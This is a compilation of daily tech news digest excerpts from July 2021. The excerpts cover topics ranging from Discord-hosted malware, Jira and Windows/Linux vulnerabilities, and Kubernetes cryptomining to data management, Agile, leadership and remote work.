Daily Tech Digest - July 25, 2021

Discord CDN and API Abuses Drive Wave of Malware Detections

Discord’s CDN is being abused to host malware, while its API is being leveraged to exfiltrate stolen data and facilitate hacker command-and-control channels, Sophos added. Because Discord is heavily trafficked by younger gamers playing Fortnite, Minecraft and Roblox, a lot of the malware floating around amounts to little more than pranking, such as the use of code to crash an opponent’s game, Sophos explained. But the spike in info stealers and remote access trojans is more is more alarming, it added. “But the greatest percentage of the malware we found have a focus on credential and personal information theft, a wide variety of stealer malware as well as more versatile RATs,” the report said. “The threat actors behind these operations employed social engineering to spread credential-stealing malware, then use the victims’ harvested Discord credentials to target additional Discord users.” The team also found outdated malware including spyware and fake app info stealers being hosted on the Discord CDN.


The sixth sense of a successful leader

The Sixth Sense endowed Leader has to possess a highly developed awareness of what needs to be done, how it needs to be done, when it needs to be done, simultaneously anticipating the needs of the human resource involved on the task, and continuously visualising the anticipated outcome. For successful employment of sixth sense the Leader needs to work on the Higher Intellect plane. This does not preclude the Leader from seeking material gains, for that is the ultimate aim of any business. However, the Leader needs to weigh the anticipated gains against likely social and environment degradation. Similarly, the Leader needs to be steeped in definable values and ethics, which in turn act as the Sixth Sense Pillar. This Pillar will be the fulcrum enabling the Leader to leverage gains beyond cognitive reasoning, and to attain the status of a Karma Yogi. The Sixth Sense Leader, a true Karma Yogi, empowers self to develop: – Vision to create rather than await opportunity, by tapping dimensional awareness of the future. Analysing and risk acceptance capability, through capacity to subtly induce change in energy fields impacting the mission.

Why Data Management Needs An Aggregator Model

As enterprises shift to a hybrid multicloud architecture, they can no longer manage data within each storage silo, search for data within each storage silo and pay a heavy cost to move data from one silo to another. As GigaOm analyst Enrico Signoretti pointed out: "The trend is clear: The future of IT infrastructures is hybrid ... [and] it requires a different and modern approach to data management." Another key reason an aggregator model for data management is needed is that customers want to extract value from their data. To analyze and search unstructured data, vital information is stored in what is called "metadata" — information about the data itself. Metadata is like an electronic fingerprint of the data. For example, a photo on your phone might have information about the time and location when it was taken as well as who was in it. Metadata is very valuable, as it is used to search, find and index different types of unstructured data. Since storage business models are built on owning the data, storage vendors will move some blocks when moving data to the cloud rather than move all of the data.

Next-Gen Data Pipes With Spark, Kafka and k8s

In Lambda Architecture, there are two main layers – Batch and Speed. The first one transforms data in scheduled batches whereas the second is responsible for near real-time data processing. The batch layer is typically used when the source system sends the data in batches, access to the entire dataset is needed for required data processing, or the dataset is too large to be handled as a stream. On the contrary, stream processing is needed for small packets of high-velocity data, where the packets are either mutually independent or packets in close vicinity form a context. Naturally, both types of data processing are computation-intensive, though the memory requirement for batch is higher than the stream layer. Architects look for solution patterns that are elastic, fault-tolerant, performing, cost-effective, flexible, and, last but not least – distributed. ... Lambda architecture is complex because it has two separate components for handling batch and stream processing of data. The complexity can be reduced if one single technology component can serve both purposes.


Moving fast and breaking things cost us our privacy and security

Tokenized identification puts the power in the user’s hands. This is crucial not just for workplace access and identity, but for a host of other, even more important reasons. Tokenized digital IDs are encrypted and can only be used once, making it nearly impossible for anyone to view the data included in the digital ID should the system be breached. It’s like Signal, but for your digital IDs. As even more sophisticated technologies roll out, more personal data will be produced (and that means more data is vulnerable). It’s not just our driver’s licenses, credit cards or Social Security numbers we must worry about. Our biometrics and personal health-related data, like our medical records, are increasingly online and accessed for verification purposes. Encrypted digital IDs are incredibly important because of the prevalence of hacking and identity theft. Without tokenized digital IDs, we are all vulnerable. We saw what happened with the Colonial Pipeline ransomware attack recently. It crippled a large portion of the U.S. pipeline system for weeks, showing that critical parts of our infrastructure are extremely vulnerable to breaches.


Agile at 20: The Failed Rebellion

In some ways, Agile was a grassroots labor movement. It certainly started with the practitioners on the ground and got pushed upwards into management. How did this ever succeed? It’s partially due to developers growing in number and value to their businesses, gaining clout. But the biggest factor, in my view, is that the traditional waterfall approach simply wasn’t working. As software got more complicated and the pace of business accelerated and the sophistication of users rose, trying to plan everything up front became impossible. Embracing iterative development was logical, if a bit scary for managers used to planning everything. I remember meetings in the mid-2000s where you could tell management wasn’t really buying it, but they were out of ideas. What the hell, let’s try this crazy idea the engineers keep talking about. We’re not hitting deadlines now. How much worse can it get? Then to their surprise, it started working, kind of, in fits and starts. Teams would thrash for a while and then slowly gain their legs, discovering what patterns worked for that individual team, picking up momentum.


Is Consciousness Bound by Quantum Physics? We're Getting Closer to Finding Out

We're not yet able to measure the behavior of quantum fractals in the brain – if they exist at all. But advanced technology means we can now measure quantum fractals in the lab. In recent research involving a scanning tunneling microscope (STM), my colleagues at Utrecht and I carefully arranged electrons in a fractal pattern, creating a quantum fractal. When we then measured the wave function of the electrons, which describes their quantum state, we found that they too lived at the fractal dimension dictated by the physical pattern we'd made. In this case, the pattern we used on the quantum scale was the SierpiƄski triangle, which is a shape that's somewhere between one-dimensional and two-dimensional. This was an exciting finding, but STM techniques cannot probe how quantum particles move – which would tell us more about how quantum processes might occur in the brain. So in our latest research, my colleagues at Shanghai Jiaotong University and I went one step further. Using state-of-the-art photonics experiments, we were able to reveal the quantum motion that takes place within fractals in unprecedented detail.


How Deepfakes Are Powering a New Type of Cyber Crime

Cybercriminals are always quick to leap onto any bandwagon that they can use to improve or modernize their attacks. Audio fakes are becoming so good that it requires a spectrum analyzer to definitively identify fakes, and AI systems have been developed to identify deepfake videos. If manipulating images lets you weaponize them, imagine what you can do with sound and video fakes that are good enough to fool most people. Crimes involving faked images and audio have already happened. Experts predict that the next wave of deepfake cybercrime will involve video. The working-from-home, video-call-laden “new normal” might well have ushered in the new era of deepfake cybercrime. An old phishing email attack involves sending an email to the victim, claiming you have a video of them in a compromising or embarrassing position. Unless payment is received in Bitcoin the footage will be sent to their friends and colleagues. Scared there might be such a video, some people pay the ransom.


5 Steps to Improving Ransomware Resiliency

Enterprises need to have a robust endpoint data protection and system security. This includes antivirus software and even whitelisting software where only approved applications can be accessed. Enterprises need both an active element of protection, and a reactive element of recovery. Companies hit with a ransomware attack can spend five days or longer recovering from an attack, so it’s imperative that companies are actively implementing the right backup and recovery strategies before a ransomware attack. Black hats who are developing ransomware are trying to prevent any means of egress from an enterprise having to pay the ransom. ... We urge organizations to implement a more comprehensive backup and recovery approach based on the National Institute of Standards and Technology (NIST) Cybersecurity Framework. It includes a set of best practices: Using immutable storage, which prevents ransomware from encrypting or deleting backups; implementing in-transit and at-rest encryption to prevent bad actors from compromising the network or stealing your data; and hardening the environment by enabling firewalls that restrict ports and processes.


This Week in Programming: Kubernetes from Day One?

“To move to Kubernetes, an organization needs a full engineering team just to keep the Kubernetes clusters running, and that’s assuming a managed Kubernetes service and that they can rely on additional infrastructure engineers to maintain other supporting services on top of, well, the organization’s actual product or service,” they write. While this is part of StackOverflow’s reasoning — “The effort to set up Kubernetes is less than you think. Certainly, it’s less than the effort it would take to refactor your app later on to support containerization.” — Ably argues that “it seems that introducing such an enormously expensive component would merely move some of our problems around instead of actually solving them.” Meanwhile, another blog post this week argues that Kubernetes is our generation’s Multics, again centering on this idea of complexity. Essentially, the argument here is that Kubernetes is “a serious, respectable, but overly complex system that will eventually be replaced by something simpler: the Unix of distributed operating systems.” Well then, back to Unix it is!



Quote for the day:

"Leaders must encourage their organizations to dance to forms of music yet to be heard." -- Warren G. Bennis

Daily Tech Digest - July 24, 2021

Quantum entanglement-as-a-service: "The key technology" for unbreakable networks

Like classical networks, quantum networks require hardware-independent control plane software to manage data exchange between layers, allocate resources and control synchronization, the company said. "We want to be the Switzerland of quantum networking," said Jim Ricotta, Aliro CEO. Networked quantum computers are needed to run quantum applications such as physics-based secure communications and distributed quantum computing. "A unified control plane is one of several foundational technologies that Aliro is focused on as the first networking company of the quantum era," Ricotta said. "Receiving Air Force contracts to advance this core technology validates our approach and helps accelerate the time to market for this and other technologies needed to realize the potential of quantum communication." Entanglement is a physical phenomenon that involves tiny things such as individual photons or electrons, Ricotta said. When they are entangled, "then they become highly correlated" and appear together. It doesn't matter if they are hundreds of miles apart, he said.


Design for Your Strengths

Strengths and weaknesses are often mirrors of each other. My aerobic weakness had, as its inverse, a superstrength of anaerobic power. Indeed, these two attributes often go hand in hand. Finally, I had figured out how to put this to use. After the Lillehammer Olympics, I dropped out of the training camp. But I was more dedicated than ever to skating. I moved to Milwaukee, and without the financial or logistical support of the Olympic Committee, began a regimen of work, business school, and self-guided athletic training. I woke up every day at 6 a.m. and went to the rink. There I put on my pads and blocks and skated from 7 until 9:30. Then I changed into a suit for my part-time job as an engineer. At 3 p.m., I left work in Milwaukee and drove to the Kellogg Business School at Northwestern, a two-hour drive. I had class from 6 to 9 p.m., usually arrived home at 11, and lifted weights until midnight. I did that every day for two and a half years. Many people assume that being an Olympic athlete requires a lot of discipline. But in my experience, the discipline is only physical. 


‘Next Normal’ Approaching: Advice From Three Business Leaders On Navigating The Road Ahead

With some analysts predicting a "turnover tsunami" on the horizon, talent strategy has taken on a new sense of urgency. Lindsey Slaby, Founding Principal of marketing strategy consultancy Sunday Dinner, focuses on building stronger marketing organizations. She shares: Organizations are accelerating growth by attracting new talent muscle and re-skilling their existing teams. A rigorous approach to talent has never been as important as it is right now. The relationship between employer and employee has undergone significant recalibration the last year with the long-term impact of the nation’s largest work-from-home experiment yet to come into clear view. But much like the Before Times, perhaps the greatest indicator of how an organization will fare on the talent front comes down to how it invests in its people and specifically their future potential. Slaby believes there is a core ingredient to any winning talent strategy: Successful organizations prioritize learning and development. Training to anticipate the pace of change is essential. It is imperative that marketers practice ‘strategy by doing’ and understand the underlying technology that fuels their go-to-market approach.


The Beauty of Edge Computing

The volume and velocity of data generated at the edge is a primary factor that will impact how developers allocate resources at the edge and in the cloud. “A major impact I see is how enterprises will manage their cloud storage because it’s impractical to save the large amounts of data that the Edge creates directly to the cloud,” says Will Kelly, technical marketing manager for a container security startup (@willkelly). “Edge computing is going to shake up cloud financial models so let’s hope enterprises have access to a cloud economist or solution architect who can tackle that challenge for them.” With billions of industrial and consumer IoT devices being deployed, managing the data is an essential consideration in any edge-to-cloud strategy. “Advanced consumer applications such as streaming multiplayer games, digital assistants and autonomous vehicle networks demand low latency data so it is important to consider the tremendous efficiencies achieved by keeping data physically close to where it is consumed,” says Scott Schober, President/CEO of Berkeley Varitronics Systems, Inc. (@ScottBVS).


Facebook Makes a Big Leap to MySQL 8

The company skipped entirely upgrading to MySQL 5.7 release, the major release between 5.6 and 8.0. At the time, Facebook was building its custom storage engine, called MyRocks, for MySQL and didn’t want to interrupt the implementation process, the engineers write. MyRocks is a MySQL adaptation for RocksDB, a storage engine optimized for fast write performance that Instagram built for to optimize Cassandra. Facebook itself was using MyRocks to power its “user database service tier,” but would require some features in MySQL 8.0 to fully support such optimizations. Skipping over version 5.7, however, complicated the upgrade process. “Skipping a major version like 5.7 introduced problems, which our migration needed to solve,” the engineers admitted in the blog post. Servers could not simply be upgraded in place. They had to use logical dump to capture the data and rebuild the database servers from scratch — work that took several days in some instances. API changes from 5.6 to 8.0 also had to be rooted out, and supporting two major versions within a single replica set is just plain tricky. 


Research shows AI is often biased. Here's how to make algorithms work for all of us

Inclusive design emphasizes inclusion in the design process. The AI product should be designed with consideration for diverse groups such as gender, race, class, and culture. Foreseeability is about predicting the impact the AI system will have right now and over time. Recent research published by the Journal of the American Medical Association (JAMA) reviewed more than 70 academic publications based on the diagnostic prowess of doctors against digital doppelgangers across several areas of clinical medicine. A lot of the data used in training the algorithms came from only three states: Massachusetts, California and New York. Will the algorithm generalize well to a wider population? A lot of researchers are worried about algorithms for skin-cancer detection. Most of them do not perform well in detecting skin cancer for darker skin because they were trained primarily on light-skinned individuals. The developers of the skin-cancer detection model didn't apply principles of inclusive design in the development of their models.


Leverage the Cloud to Help Consolidate On-Prem Systems

The recommended approach is to "create or recreate" a representation of the final target system in-the-cloud, but not re-engineer any components into cloud-native equivalents. The same number of LPARs, same memory/disk/CPU allocations, same file system structures, same exact IP addresses, same exact hostnames, and network subnets are created in the cloud that represents as much as possible a "clone" of the eventual system of record that will exist on-prem. The benefit of this approach is that you can apply "cloud flexibility" to what was historically a "cloud stubborn" system. Fast cloning, ephemeral longevity, software-defined networking, API automation can all be applied to the temporary stand-in running in the cloud. As design principles are finalized based on research performed on the cloud version of the system, those findings can be applied to the on-prem final buildout. To jump-start the cloud build-out process, it is possible to reuse existing on-prem assets as the foundation for components built in the cloud. LPARs in the cloud can be based on existing mksysb images already created on-prem. 


Scaling API management for long-term growth

To manage the complexity of the API ecosystem, organisations are embracing API management tools to identify, control, secure and monitor API use in their existing applications and services. Having visibility and control of API consumption provides a solid foundation for expanding API provision, discovery, adoption and monetisation. Many organizations start with an in-house developed API management approach. However, as their API management strategies mature, they often find the increasing complexity of maintaining and monitoring the usage of APIs, and the components of their API management solution itself, a drain on technical resources and a source of technical debt. A common challenge for API management approaches is becoming a victim of one’s own success. For instance, a company that deploys an API management solution for a region or department may quickly get requests for access from other teams seeking to benefit from the value delivered, such as API discoverability and higher service reliability. While this demand should be seen as proof of a great approach to digitalization, it adds challenges and raises questions for example around capacity, access control, administration rights and governance.


Is Blockchain the Ultimate Cybersecurity Solution for My Applications?

Blockchain can provide a strong and effective solution for securing networked ledgers. However, it does not guarantee the security of individual participants or eliminate the need to follow other cybersecurity best practices. Blockchain application depends on external data or other at-risk resources; thus, it cannot be a panacea. The blockchain implementation code and the environments in which the blockchain technology run must be checked for cyber vulnerabilities. Blockchain technology provides stronger, transactional security than traditional, centralized computing services for secured networked transaction ledger. For example, say I use distributed ledger technology (DLT), an intrinsic blockchain feature, while creating my blockchain-based application. DLT increases cyberresiliency because it creates a situation where there is no single point of contact. In the DLT, an attack on one or a small number of participants does not affect other nodes. Thus, DLT helps maintain transparency and availability, and continue the transactions. Another advantage of DLT is that endpoint vulnerabilities are addressed.


Why bigger isn’t always better in banking

Of course, there are outliers. One of them is Brown Brothers Harriman, a merchant/investment bank that traces its origins back some 200 years, and that is the subject of an engaging new book, Inside Money. Historian Zachary Karabell (disclosure: we were graduate school classmates in the last millennium) offers not just an intriguing family and personal history, but a lesson in how to balance risk and ambition against responsibility and longevity—and in why bigger isn’t always better. The firm’s survival is even more remarkable given that US financial history often reads as a string of booms, bubbles, busts, and bailouts. The Panic of 1837. The Panic of 1857. The Civil War. The Panic of 1907. The Great Depression. The Great Recession of 2008. In finance, leverage—i.e., debt—is the force that allows companies to lift more than they could under their own power. It’s also the force that can crush them when circumstances change. And Brown Brothers has thrived in part by avoiding excessive leverage. Today, the bank primarily “acts as a custodian for trillions of dollars of global assets,” Karabell writes. “Its culture revolves around service.”



Quote for the day:

"Leadership is absolutely about inspiring action, but it is also about guarding against mis-action." -- Simon Sinek

Daily Tech Digest - July 23, 2021

The CISO: the enabler of innovation

With digital transformation already in focus for many businesses, adding a now distributed workforce on top of this scenario ratchets up the security challenge. One in five CEOs and CISOs saw a major increase in all types of cyber attacks since COVID-19, with supply chain attacks topping the table side by side with ransomware. The key here is to enable and drive businesses, rather than impede them. By moving to support remote workers by adjusting policies and controls discreetly, businesses can enable teams to work better in their own role in their own job. This means allowing them to access data from anywhere while providing better visibility 24/7, enabling more proactive alerts and controls. In fact, 58% of CEOs and CISOs have recognised the need for a more integrated trust framework, with 48% also substantially increasing the use of cloud-based cyber security systems. In the future, the workforce will have even more autonomy within the decentralised cultures that develop as business leaders find new ways to drive collaboration and creativity. For the CISO, this means continuous adapting to an evolving workplace.


Why unstructured data is the future of data management

Today, data is a valuable corporate asset. You’ve got to be strategic with it because it’s not just for your BI teams, but for the R&D and customer success teams. They need historical data to build new products or to improve the ones they already have. This is super relevant in manufacturing, such as in the semiconductor chip industry, but also in other industries that are so important to our economy, such as pharmaceuticals. COVID researchers depended upon access to SARS data when developing vaccines and treatments. Data often becomes valuable again later, and what if you don’t know what you have or you can’t find it? We’ve had customers in the media and entertainment business, and in the past when they wanted to find an old show, they’d need access to a tape archive. Then, they needed an asset tag to locate the tape. That can be very difficult, and it’s why archiving is not popular. Live archive solutions that are available today make archived data instantly accessible and transparently tier data so users can easily locate files and access them anytime.


Here’s how to check your phone for Pegasus spyware using Amnesty’s tool

The first thing to note is the tool is command line or terminal based, so it will take either some amount of technical skill or a bit of patience to run. We try to cover a lot of what you need to know to get up and running here, but it’s something to know before jumping in. The second note is that the analysis Amnesty is running seems to work best for iOS devices. In its documentation, Amnesty says the analysis its tool can run on Android phone backups is limited, but the tool can still check for potentially malicious SMS messages and APKs. Again, we recommend following its instructions. ... If you’re using a Mac to run the check, you’ll first need to install both Xcode, which can be downloaded from the App Store, and Python3 before you can install and run mvt. The easiest way to obtain Python3 is using a program called Homebrew, which can be installed and run from the Terminal. After installing these, you’ll be ready to run through Amnesty’s iOS instructions. If you run into issues while trying to decrypt your backup, you’re not alone. The tool was giving me errors when I tried to point it to my backup, which was in the default folder. 


Critical Jira Flaw in Atlassian Could Lead to RCE

The vulnerability has to do with a missing authentication check in Jira’s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching, Java EE and lightweight containers that’s used for performance and which simplifies scalability. Atlassian said that the bug was introduced in version 6.3.0 of Jira Data Center, Jira Core Data Center, Jira Software Data Center and Jira Service Management Data Center (known as Jira Service Desk prior to 4.14). According to Atlassian’s security advisory, that list of products exposed a Ehcache remote method invocation (RMI) network service that attackers – who can connect to the service on port 40001 and potentially 40011 – could use to “execute arbitrary code of their choice in Jira” through deserialization, due to missing authentication. RMI is an API that acts as a mechanism to enable remote communication between programs written in Java. It allows an object residing in one Java virtual machine (JVM) to invoke an object running on another JVM; Often, it involves one program on a server and one on a client. ...”


Improving Your Productivity With Dynamic Problems

First, a Huffman code tree is built. Let the original alphabet consist of n characters, the i-th of which occurs pi times in the input text. Initially, all symbols are considered active nodes of the future tree, the i-th node is marked with pi. At each step, we take two active vertices with the smallest labels, create a new vertex, labeling it with the sum of the labels of these vertices, and make it their parent. The new vertex becomes active, and its two children are removed from the list of active vertices. The process is repeated many times until only one active vertex remains, which is assumed to be the root of the tree. Note that the symbols of the alphabet are represented by the leaves of this tree. For each leaf (symbol), the length of its Huffman code is equal to the length of the path from the root of the tree to it. The code itself is constructed as follows: for each internal vertex of the tree, consider two arcs going from it to the children. We assign the label 0 to one of the arcs, and to the other 1. The code of each symbol is a sequence of zeros and ones on the path from the root to the leaf.


Top 5 NCSC Cloud Security Principles for Compliance

Modern business IT infrastructures are complex, and data regularly moves between different across the network. It’s critical to protect sensitive data belonging to your customers and employees as it traverses between business applications/devices and the cloud. It’s also imperative that your cloud vendor protects data in transit inside the cloud such as when data is replicated to a different region to ensure high availability. ... Different regulations have different requirements about where protected data can be stored. For example, some regulations stipulate that data can only be transferred to companies with sufficient levels of protection in processing personal data. If your business opts for a cloud provider that doesn’t provide transparency over the location of data, you could end up unknowingly in breach of regulations. ... The last thing your business wants is to use a public cloud service only to find that a malicious hacker accessed your sensitive data by compromising another customer first. This type of concerning non-compliance scenario can happen when there is an insufficient separation between different customers of a cloud service.


Data and Analytics Salaries Heat Up in Recovery Economy

There are a few reasons why the market is really strong for data scientist and analytics pros right now. First, we are coming off a period of stagnation where no one wanted to change jobs and salaries stayed the same. That means those individuals who were considering a job change most likely put those plans on hold during the pandemic. Now all those people are getting back into the market. Second, there are so many new remote job opportunities, which opens up a whole new realm of job possibilities for data science and analytics pros. Third, as people move on to new jobs, they create vacancies where they were, opening up additional job vacancies. Fourth, there are some industries that had to change their business models to continue to operate during the pandemic economy. Burtch Works specifically points to retail, which had to enable digital channels to replace sales lost in brick-and-mortar stores. The Burtch Works report notes that many retailers have been expanding their data science and analytics teams and offering higher compensation than Burtch Works has typically seen in retail.


Home-office networks demand better monitoring tools

Networking professionals said they are enhancing their network operations toolsets in three primary ways. First, 54.2% are looking for tools that deliver security-related insights into home-office environments. This will help them collaborate with security teams to ensure that their increasing distributed networks are compliant with policies. It will also help them discern whether a user-experience issue is related to a security problem. Second, 52.6% need new dashboard and reporting features that allow them to focus on home offices and remote workers, which will help admins and engineers spot problems and troubleshoot them more efficiently. If their existing tools lack adequate dashboard and reporting customization, they’ll have to look elsewhere for this view into their networks. Third, 49.4% need to upgrade the scalability of their tools. ... Network teams will need to integrate their tools with other systems to improve their ability to support home workers. For instance, 43% said home-office monitoring requirements are producing a need for their monitoring tools to integrate with their SD-WAN or secure access service edge (SASE) solution. 


Hybrid work: 7 ways to enable asynchronous collaboration

One of the main differences between asynchronous and synchronous work is that the former tends to center on time- or task-defied work processes. “Asynchronous work requires a grasp of what the outcome – the final product of work – needs to be, as opposed to the amount of time spent in close coordination producing the final product,” says Dee Anthony, director at global technology research and advisory firm ISG. IT leaders need to get better at defining, managing, and measuring outcomes. Anthony suggests taking a page out of the agile playbook: Identify outcomes, estimate the effort required to accomplish them, track work velocity, and perform regular reviews. You must also foster a culture of trust. “Having people work across time, even in the same country, means that the old nine-to-five is out the window,” says Iain Fisher, director at ISG. "Managers cannot be there all the time, so a culture change of trust and respect must evolve." ... “Working asynchronously requires very strong written communication skills to avoid ambiguity and misunderstanding,” says Lars Hyland


Outcome Mapping - How to Collaborate With Clarity

The Outcome Map is an excellent way to create energetic communication, clarity, and alignment from the start (or re-start) of any initiative. It also reminds you to stay on track as you progress, and how to know when we’re drifting from the path. By adding measurements and methods, you can describe where you want to go and how you plan to get there. In both a project and product approach, clarity of outcomes is critical, but what’s often forgotten are the factors affecting the odds of achieving the outcome. Outcome mapping allows us to explore, anticipate, and design mitigation approaches to factors impacting our desired outcome. For this reason, it’s also commonly referred to as impact mapping. In practice, you can map many factors involved in a given outcome, but a few critical ingredients should always be present. Defining measures (or indicators) of progress (summarized as ‘Measures’ in the map itself) allows you to measure and celebrate progress without waiting until the distant deadline of your primary outcome to find out if you’ve succeeded or failed.



Quote for the day:

"It is the responsibility of leadership to provide opportunity, and the responsibility of individuals to contribute." -- William Pollard

Daily Tech Digest - July 22, 2021

How SMEs in e-commerce can drive value from machine learning

It’s important to realise that implementing machine learning in processes like customer segmentation means digging deeper into data than ever before, and ensuring the algorithms your business uses are underpinned by a thorough understanding of this data. Simply taking superficially similar customers and grouping them together when recommending products won’t go far enough for it to work successfully. The next step is to ensure the business is compatible with machine learning in the long run. For example, business problems where machine learning could be useful should be identified early on, and companies should get into the habit of preparing their data so that machine learning can be integrated without too much difficulty and disruption. Crucially, organisations should also identify relevant machine learning experts who can drive such projects forward, either internally or through outsourcing via external consultants. Finally, one of the most pressing concerns in the minds of many business leaders reluctant to implement machine learning is the threat the technology could pose to human staff.


Are you ready for the newest era of DevSecOps?

Many organizations have shifted security left, or at least started on their journey, in an effort to improve development velocity while also managing security risks. When starting with their incumbent tools, many organizations find it difficult to cobble together a variety of different security scanners and trying to integrate them into a complex DevOps toolchain. We hear from customers that siloed tooling has hindered collaboration. Many of our customers turned to GitLab to simplify their DevSecOps process. GitLab is often at the forefront of the DevSecOps and "shift security left" conversations among developers and businesses because of the simplicity and effectiveness of embracing security capabilities via a single platform. Developers need to find and fix vulnerabilities within their natural workflow earlier, without friction or distractions, while businesses must protect their IP in an age when the stakes of security have never been higher. When security capabilities are embedded into the end-to-end software processes, then developers can spend time writing code instead of managing tools. 


Kubernetes Cloud Clusters Face Cyberattacks via Argo Workflows

Researchers said the misconfigurations can also expose sensitive information such as code, credentials and private container-image names (which can be used to assist in other kinds of attacks). Intezer’s scan of the web found scads of unprotected instances, operated by companies in several industries, including technology, finance and logistics. “We have identified infected nodes and there is the potential for larger-scale attacks due to hundreds of misconfigured deployments,” according to Intezer. In one case, bad code was running on an exposed cluster in Docker Hub for nine months before being discovered and removed. Attacks aren’t difficult to carry out: Researchers observed different popular Monero-mining malware being housed in containers located in repositories like Docker Hub, including Kannix and XMRig. Cybercriminals need only to pull one of those containers into Kubernetes via Argo or another avenue. For instance, Microsoft recently flagged a wave of miners infesting Kubernetes via the Kubeflow framework for running machine-learning workflows.


AI execs unpack call center automation boom

Purkayastha says that technological improvements over the past five years have set the stage for the wider adoption of automation in the call center. Superior automatic speech recognition and transcription are accelerating the velocity of deploying solutions, while knowledge graphs — knowledge bases with graph-structured data models — are extracting information pertinent to support agents. Beyond this, automation technologies now better understand the semantics of conversations and continuously learn, optimizing toward business KPIs. Of course, these systems require data to train, and accumulating the data — along with processing, normalizing, and cleaning it — can take time. Schebella says that it’s not unusual for 30, 60, or 90 days to elapse before a natural language processing model begins to perform satisfactorily. In the future, he expects data collection to become less of a problem as call automation technologies provide more real-time feedback — for example, indicating to a customer service agent whether they’re speaking too quickly or slowly. 


A Guide to Stress-Free Cybersecurity for Lean IT Security Teams

Today's cybersecurity landscape is enough to make any security team concerned. The rapid evolution and increased danger of attack tactics have put even the largest corporations and governments at heightened risk. If the most elite security teams can't prevent these attacks from happening, what can lean security teams look forward to? Surprisingly, leaner teams have a much greater chance than they think. It might seem counterintuitive, but recent history has shown that large numbers and huge budgets aren't the difference-makers they once were. Indeed, having the right strategy in place is a clear indicator of an organization's success today. A new guide by XDR provider Cynet looks to dispel the myth that bigger is always better and shows a smarter way forward for lean IT security teams. The new guide focuses on helping lean IT security teams plan strategies that can protect their organizations while reducing the level of stress they face. Due to the rise of cyber tools that can help level the playing field and a new generation of security professionals, smaller organizations can now defend their organizations equally.


4 Patterns for Microservices Architecture in Couchbase

One of the key characteristics of microservices is their loose coupling, so that they can be developed, deployed, access-controlled and scaled on an individual basis. Loose coupling requires that the underlying database infrastructure supports isolating the data for the individual microservices. That could be either by running individual database instances per microservice or by controlling access to the relevant parts of the data. While traditional relational databases support isolation using database schemas, they are often difficult to scale, they lack the flexibility of a JSON data model, and most importantly, they become the single point of failure in case of an outage of your database infrastructure. This is an important aspect to consider when designing your microservice architecture, as an outage has severe consequences for all microservices sharing the same database. Couchbase is designed for microservices. It’s a highly scalable, resilient and distributed database. It offers great flexibility and provides multiple levels of isolation to support up to one thousand microservices in the same Couchbase cluster.


Moving OT to the cloud means accounting for a whole new host of security risks

In addition to using attacks that all cloud platforms are vulnerable to, Team82 said one of its approaches involves gaining unauthorized access to an operator account "using different methods." Again, these different methods are likely similar to other attacks used to steal credentials, like phishing, which has been on the rise as more organizations move to cloud-based models to enable remote work. Team82 detailed two different approaches to gaining access to OT networks and hardware: A top-down approach that involves gaining access to a privileged account and thus a cloud dashboard, and a bottom-up approach that starts by attacking an endpoint device like a PLC from which they can execute malicious remote code. Regardless of the method, the end result for the attacker is the same: Access to, and control of, an OT cloud management platform and the ability to disrupt devices and businesses. An attacker could stop a PLC program responsible for temperature regulation of the production line, or change centrifuge speeds as was the case with Stuxnet.


Why Going Digital Isn’t Enough to Meet the New Customer Experience (CX) Imperative

Traditional silos are directed by functional leaders—service, marketing, commerce—but customers expect a unified approach to CX. Building a customer-centered organization requires operational innovation, and existing models don’t scale. CDOs, CMOs, CIOs, and CxOs—supported by CEOs, CFOs, COOs, and board members—must build an alliance: a working group or steering committee that is responsible and accountable for centralized, unified, and collaborative customer understanding and engagement. Ultimately, a customer-centered organization needs a leader who is probably not the chief executive officer but a chief experience officer: an orchestrator with day-to-day leadership, accountability, and tireless focus on the personal touch in a reimagined analog, digital, and hybrid customer journey. It takes day-to-day leadership, accountability, and tireless focus. Companies leading in CX are more than twice as likely to have a chief experience officer than those that have made less progress.


The role of tech in the future of keeping the workforce well post-pandemic

The bigger picture is that a ‘return to work’ doesn’t mean back to the office. It might not even mean remote working. The talk of the rise of the ‘third workplace’, where employees can work from wherever they choose, means that a modern day workforce needs a completely mobile infrastructure. So what does this look like? Firstly, using an integrated company news feed as part of your communications platform allows remote workers to cut past the often-laborious task of checking their emails and get to the priorities of the day. While emails can be easily overlooked, a news feed that highlights urgent issues and offers real-time updates which remote workers can receive across different channels helps boost a culture of openness and inclusion. Having the tools to communicate health and safety updates results in transparency around important matters like the risk of transmission and the safety measures implemented. A key question for organisations post-pandemic has to be how they leverage tech beyond workforce optimisation. 


Questions that help CISOs and boards have each other’s back

An accountability approach should dictate who takes ownership of what. The vice president of human resources is responsible for organizing vetting; the chief information officer must be held responsible for IT security; and the chief financial officer must have plans for combating many forms of fraud, which include strategies for combating phishing and business email compromise, scenarios for handling ransomware attacks and efforts to harden the tools and processes utilized by accounts payable. The deeper you follow the accountability way of thinking, the more inclusive your leadership must be when it comes cybersecurity. This can’t be a lone-wolf operation. The purpose of a security team is to become an ally for your executive team, not to passivate them. A proper security leader must determine—and share with the CEO and the board of directors, if necessary—whether the responsible persons are up to their tasks and committed to reaching security objectives.



Quote for the day:

"Leaders know the importance of having someone in their lives who will unfailingly and fearlessly tell them the truth." -- Warren G. Bennis

Daily Tech Digest - July 21, 2021

Two-for-Tuesday vulnerabilities send Windows and Linux users scrambling

The world woke up on Tuesday to two new vulnerabilities—one in Windows and the other in Linux—that allow hackers with a toehold in a vulnerable system to bypass OS security restrictions and access sensitive resources. As operating systems and applications become harder to hack, successful attacks typically require two or more vulnerabilities. One vulnerability allows the attacker access to low-privileged OS resources, where code can be executed or sensitive data can be read. A second vulnerability elevates that code execution or file access to OS resources reserved for password storage or other sensitive operations. The value of so-called local privilege escalation vulnerabilities, accordingly, has increased in recent years. The Windows vulnerability came to light by accident on Monday when a researcher observed what he believed was a coding regression in a beta version of the upcoming Windows 11. The researcher found that the contents of the security account manager—the database that stores user accounts and security descriptors for users on the local computer—could be read by users with limited system privileges.


Establishing the right analytics-based maintenance strategy

